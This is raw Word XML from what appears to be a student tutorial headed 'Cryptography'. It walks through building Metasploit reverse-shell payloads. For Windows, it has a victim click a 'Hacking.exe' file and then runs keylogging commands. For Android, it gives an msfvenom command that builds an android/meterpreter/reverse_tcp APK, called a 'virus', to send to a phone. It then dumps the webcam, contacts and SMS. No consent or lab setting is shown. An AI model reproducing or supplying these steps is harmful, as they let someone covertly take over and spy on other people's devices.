      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="747CD73A" wp14:editId="426CE040">
            <wp:extent cx="5943600" cy="264084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9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4"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="264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72E68" w14:textId="77777777" w:rsidR="005B5BC9" w:rsidRPr="00B82381" w:rsidRDefault="005B5BC9" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11084864" w14:textId="747F0303" w:rsidR="00594DBE" w:rsidRPr="00B82381" w:rsidRDefault="00594DBE" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>It will make</w:t>
      </w:r>
      <w:r w:rsidR="00267E0D" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a file “Hacking.exe” in C</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00267E0D" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>:Users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154988D" w14:textId="3645767B" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="001F2A2D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045419FF" w14:textId="40A1B417" w:rsidR="00755670" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1686BF42" wp14:editId="38B75EC3">
            <wp:extent cx="5943600" cy="33413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1033" w14:textId="77777777" w:rsidR="00267E0D" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390D3D66" w14:textId="7B5708FE" w:rsidR="00594DBE" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hack in to windows by clicking the file “Hacking.exe“</w:t>
      </w:r>
      <w:r w:rsidR="00474E91" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and write a command at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start reading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16082068" w14:textId="3AE84760" w:rsidR="002B5CEF" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD4ED4B" w14:textId="53853DD3" w:rsidR="002B5CEF" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19CE9AD6" wp14:editId="246FCA5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FCB5" w14:textId="49D545C8" w:rsidR="002B5CEF" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5026CFCA" w14:textId="7A9E678F" w:rsidR="002B5CEF" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Now you can see whatever the user is doing on windows for example write this to see.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095ABC20" w14:textId="49E41A57" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sessions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00076EBD" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  sessions 1 and help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0A710" w14:textId="4ED35512" w:rsidR="008654D3" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E43ABCF" wp14:editId="61174122">
            <wp:extent cx="5923128" cy="3186752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2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" b="4627"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5923128" cy="318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44307" w14:textId="1C7368BC" w:rsidR="00D2580E" w:rsidRPr="00B82381" w:rsidRDefault="002B5CEF" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DA7813" wp14:editId="3FF3C0FB">
            <wp:extent cx="5922645" cy="3179928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3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" b="4831"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5922645" cy="3179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5BBEE" w14:textId="77777777" w:rsidR="00407978" w:rsidRPr="00B82381" w:rsidRDefault="00407978" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="320ECC6D" w14:textId="4BC235C1" w:rsidR="00D2580E" w:rsidRPr="00B82381" w:rsidRDefault="00176E46" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00D2580E" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ou can now use multiple commands like.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF11BE" w14:textId="03975DC1" w:rsidR="00D2580E" w:rsidRPr="00B82381" w:rsidRDefault="00D2580E" w:rsidP="00364141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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Keyscan_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003762E5" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">t will start to store all the key pressed), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Keystart_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(it will show all the key pressed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F77CA13" w14:textId="77777777" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="001F2A2D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFA17E5" w14:textId="77777777" w:rsidR="001A688C" w:rsidRPr="00B82381" w:rsidRDefault="001A688C" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531AFD3E" w14:textId="40240403" w:rsidR="006D5622" w:rsidRPr="00B82381" w:rsidRDefault="001A688C" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>For android do these steps make a virus with extension of .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send it to the android phone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BAC7D3" w14:textId="1431CAC8" w:rsidR="006D5622" w:rsidRPr="00B82381" w:rsidRDefault="006D5622" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> console write “Set payload android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB056C2" w14:textId="77777777" w:rsidR="001A688C" w:rsidRPr="00B82381" w:rsidRDefault="001A688C" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="155A359F" wp14:editId="4A240395">
            <wp:extent cx="5895833" cy="3159457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41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" b="5445"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5895833" cy="315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2CABD" w14:textId="7EACB5DA" w:rsidR="001A688C" w:rsidRPr="00B82381" w:rsidRDefault="006D5622" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> console write “Set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00A12C05" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>192.168.0.105</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3AAEC" w14:textId="3A34F3BD" w:rsidR="006D5622" w:rsidRPr="00B82381" w:rsidRDefault="006D5622" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Chec</w:t>
      </w:r>
      <w:r w:rsidR="00957CB9" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>k port and LHOST “show options”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C12D83" w14:textId="51DDED93" w:rsidR="006D5622" w:rsidRPr="00B82381" w:rsidRDefault="006D5622" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">To get an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> write “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>” and use ipv4 address “</w:t>
      </w:r>
      <w:r w:rsidR="00A12C05" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>192.168.0.105</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D6C3B" w14:textId="3915C58D" w:rsidR="001A688C" w:rsidRPr="00B82381" w:rsidRDefault="00407014" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Now create a virus on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p android/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=</w:t>
      </w:r>
      <w:r w:rsidR="00A12C05" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>192.168.0.105</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4444 </w:t>
      </w:r>
      <w:r w:rsidR="00A12C05" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">R &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A12C05" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>project.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004918AD" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D241D1" w14:textId="77777777" w:rsidR="004918AD" w:rsidRPr="00B82381" w:rsidRDefault="004918AD" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661FD799" w14:textId="6EF018C1" w:rsidR="001A688C" w:rsidRPr="00B82381" w:rsidRDefault="004918AD" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you can see an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>project.apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>” is create</w:t>
      </w:r>
      <w:r w:rsidR="00262768" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C2BE6" w14:textId="32CEF74F" w:rsidR="002D2700" w:rsidRPr="00B82381" w:rsidRDefault="004918AD" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Now use multiple commands to get pic</w:t>
      </w:r>
      <w:r w:rsidR="00405F4F" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">s and contact list </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>like ”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>webcam_snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>dump_contacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>dump_sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002D2700" w:rsidRPr="00B82381" w:rsidSect="00BF64F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E1716" w14:textId="77777777" w:rsidR="00AE7221" w:rsidRDefault="00AE7221" w:rsidP="00076EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13A8954C" w14:textId="77777777" w:rsidR="00AE7221" w:rsidRDefault="00AE7221" w:rsidP="0007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3E4B7D" w14:textId="77777777" w:rsidR="009950FF" w:rsidRDefault="009950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A8DF" w14:textId="2EBC2FF3" w:rsidR="009950FF" w:rsidRDefault="009950F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CD13DC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1C7DE2EE" w14:textId="77777777" w:rsidR="009950FF" w:rsidRDefault="009950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918EE" w14:textId="77777777" w:rsidR="009950FF" w:rsidRDefault="009950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AF4E4" w14:textId="77777777" w:rsidR="00AE7221" w:rsidRDefault="00AE7221" w:rsidP="00076EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6AFC8635" w14:textId="77777777" w:rsidR="00AE7221" w:rsidRDefault="00AE7221" w:rsidP="0007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0308C" w14:textId="77777777" w:rsidR="009950FF" w:rsidRDefault="009950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202A8" w14:textId="1810C22A" w:rsidR="009950FF" w:rsidRDefault="009950F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F5859F" wp14:editId="4713FFB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F282D89" w14:textId="0A0C1102" w:rsidR="009950FF" w:rsidRDefault="009950F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Cryptography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55F5859F" id="Rectangle 197" o:spid="_x0000_s103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F282D89" w14:textId="0A0C1102" w:rsidR="009950FF" w:rsidRDefault="009950F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Cryptography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32656" w14:textId="77777777" w:rsidR="009950FF" w:rsidRDefault="009950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C5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8890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F3AD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28B3B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A8C5D3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39D87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C4931"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2170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B543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8BD452E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8060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72A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07E0CC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C93445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9C32E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A051D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7EA13F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18D86A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67B7EEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C69E19DA"/>
    <w:lvl w:ilvl="0" w:tplc="D53A8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8709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69653D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01F8CC3C"/>
    <w:lvl w:ilvl="0" w:tplc="736671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CC436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2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
